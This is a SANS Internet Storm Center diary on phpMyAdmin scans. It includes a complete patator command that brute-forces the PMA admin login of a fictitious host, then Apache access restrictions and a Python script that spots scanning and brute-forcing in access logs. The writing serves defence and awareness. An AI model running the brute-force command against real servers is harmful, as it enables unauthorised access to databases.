
SANS Internet Storm Center, InfoCON: green: Increase of phpMyAdmin scans, (Mon, Aug 7th)


PMA (or phpMyAdmin) is a well-known MySQL front-end written in PHP that "brings MySQL to the web", as stated on its website[1]. The tool is very popular amongst web developers because it lets them maintain databases from a web browser. This also means that the front-end may be publicly exposed. It is a common finding in penetration tests to come across an old PMA interface left behind by an admin, often a version with known vulnerabilities[3].

Even if PMA restricts access with a login page, there is no protection against brute-force attacks on that login page: PMA does not lock accounts or throttle failed attempts, so an attacker can try passwords as fast as the server answers. Here is an example of such an attack with patator[2] against a fictitious target (the fields in the body are the ones PMA's login form submits):

    $ patator http_fuzz url=http://www.acme.org/pma/index.php \
        method=POST \
        body='pma_username=admin&pma_password=COMBO00&server=1&target=index.php&lang=en&token=' \
        0=dictionary.txt \
        before_urls=http://www.acme.org/pma/index.php \
        accept_cookie=1 \
        follow=1 \
        -x ignore:fgrep='Cannot log in to the MySQL server'

Each candidate password from dictionary.txt is submitted for the "admin" user. "before_urls" loads the login page before each attempt so that a session cookie is set, and the "-x ignore" filter hides every response containing the MySQL login error, so only a successful login remains in the output.

If the interface cannot simply be taken offline, do not leave it reachable from the whole Internet: restrict it to the addresses that really need it. With Apache 2.2 style access control:

    <Directory /pma>
        order deny,allow
        deny from all
        allow from 10.0.0.1
        allow from 10.0.0.2
    </Directory>

Note that "Directory" matches a filesystem path, so use the directory PMA is actually installed in (or a "Location" block if you want to match the URL path). On Apache 2.4 the same restriction is written as "Require ip 10.0.0.1 10.0.0.2" inside the block.
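To spot the scans and brute-force attempts described above in your own web server logs, here is an added example in Python (not code from the diary, from patator or from phpMyAdmin). It parses Apache "combined" format access log lines, flags sources that probe several phpMyAdmin-style directory names, and flags sources that repeatedly POST to a PMA login page. The log lines, the list of probed directory names and the thresholds are constructed for the example and are assumptions, not data from the diary.

```python
import re
import sys
from collections import defaultdict

# Constructed sample of Apache "combined" access log lines (synthetic, not real traffic).
# 203.0.113.7 enumerates PMA paths, 198.51.100.9 hammers the login form,
# 10.0.0.1 is a legitimate admin, 192.0.2.5 never touches PMA.
SAMPLE_LOG = """\
203.0.113.7 - - [07/Aug/2017:10:01:02 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 209 "-" "Mozilla/5.0"
203.0.113.7 - - [07/Aug/2017:10:01:02 +0000] "GET /pma/ HTTP/1.1" 200 1533 "-" "Mozilla/5.0"
203.0.113.7 - - [07/Aug/2017:10:01:03 +0000] "GET /myadmin/ HTTP/1.1" 404 209 "-" "Mozilla/5.0"
203.0.113.7 - - [07/Aug/2017:10:01:03 +0000] "GET /PHPMyAdmin/index.php HTTP/1.1" 404 209 "-" "Mozilla/5.0"
198.51.100.9 - - [07/Aug/2017:10:02:10 +0000] "POST /pma/index.php HTTP/1.1" 200 4120 "http://www.acme.org/pma/index.php" "python-requests/2.18.4"
198.51.100.9 - - [07/Aug/2017:10:02:10 +0000] "POST /pma/index.php HTTP/1.1" 200 4120 "http://www.acme.org/pma/index.php" "python-requests/2.18.4"
198.51.100.9 - - [07/Aug/2017:10:02:11 +0000] "POST /pma/index.php HTTP/1.1" 200 4120 "http://www.acme.org/pma/index.php" "python-requests/2.18.4"
198.51.100.9 - - [07/Aug/2017:10:02:11 +0000] "POST /pma/index.php HTTP/1.1" 200 4120 "http://www.acme.org/pma/index.php" "python-requests/2.18.4"
198.51.100.9 - - [07/Aug/2017:10:02:12 +0000] "POST /pma/index.php HTTP/1.1" 200 4120 "http://www.acme.org/pma/index.php" "python-requests/2.18.4"
10.0.0.1 - - [07/Aug/2017:10:05:00 +0000] "GET /pma/index.php HTTP/1.1" 200 1533 "-" "Mozilla/5.0"
10.0.0.1 - - [07/Aug/2017:10:05:04 +0000] "POST /pma/index.php HTTP/1.1" 302 0 "http://www.acme.org/pma/index.php" "Mozilla/5.0"
192.0.2.5 - - [07/Aug/2017:10:06:00 +0000] "GET /index.html HTTP/1.1" 200 812 "-" "Mozilla/5.0"
"""

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Directory names commonly probed for a phpMyAdmin install. This list is an assumption
# made for the example; extend it with the aliases you see in your own logs.
PMA_DIRS = ("phpmyadmin", "pma", "myadmin", "mysql", "dbadmin", "phpmyadmin2")


def parse_line(line):
    """Return the fields of one combined-format log line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_pma_path(path):
    """True if the first directory of the request path is a known PMA alias (case-insensitive)."""
    first = path.lstrip("/").split("/", 1)[0].lower()
    return first in PMA_DIRS


def analyze(log_text, scan_threshold=3, bruteforce_threshold=5):
    """Return (scanners, brute_forcers).

    scanners: {ip: [distinct PMA paths probed]} for sources that touched at least
              scan_threshold distinct PMA paths (typical of a scanner walking a wordlist).
    brute_forcers: {ip: count} for sources that POSTed to a PMA path at least
              bruteforce_threshold times. PMA answers a failed login with 200 and
              the login page again, so the status code alone does not separate
              failures from successes; POST volume from one source is the signal here.
    """
    probed = defaultdict(set)
    login_posts = defaultdict(int)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not is_pma_path(rec["path"]):
            continue
        probed[rec["ip"]].add(rec["path"].lower())
        if rec["method"] == "POST":
            login_posts[rec["ip"]] += 1
    scanners = {ip: sorted(paths) for ip, paths in probed.items() if len(paths) >= scan_threshold}
    brute_forcers = {ip: n for ip, n in login_posts.items() if n >= bruteforce_threshold}
    return scanners, brute_forcers


if __name__ == "__main__":
    # Pass a real access log as the first argument, otherwise the constructed sample is used.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LOG
    scanners, brute_forcers = analyze(text)
    for ip, paths in scanners.items():
        print(f"scan       {ip}: {len(paths)} PMA paths probed: {', '.join(paths)}")
    for ip, n in brute_forcers.items():
        print(f"bruteforce {ip}: {n} POSTs to a PMA login page")
```

On the sample above this reports 203.0.113.7 as a scanner (four distinct PMA paths) and 198.51.100.9 as a brute-forcer (five POSTs to /pma/index.php), while the admin at 10.0.0.1 stays below both thresholds. The thresholds are deliberately low for the sample; on a busy server you would count per time window rather than over the whole file, and the offending addresses can be handed to fail2ban or to the firewall. The "allow from" list in the Apache snippet above is the real fix, though: detection only tells you who is knocking.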

[1]https://www.phpmyadmin.net/
[2]https://github.com/lanjelot/patator
[3]https://www.cvedetails.com/vulnerability-list/vendor_id-784/cvssscoremin-7/cvssscoremax-7.99/Phpmyadmin.html

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
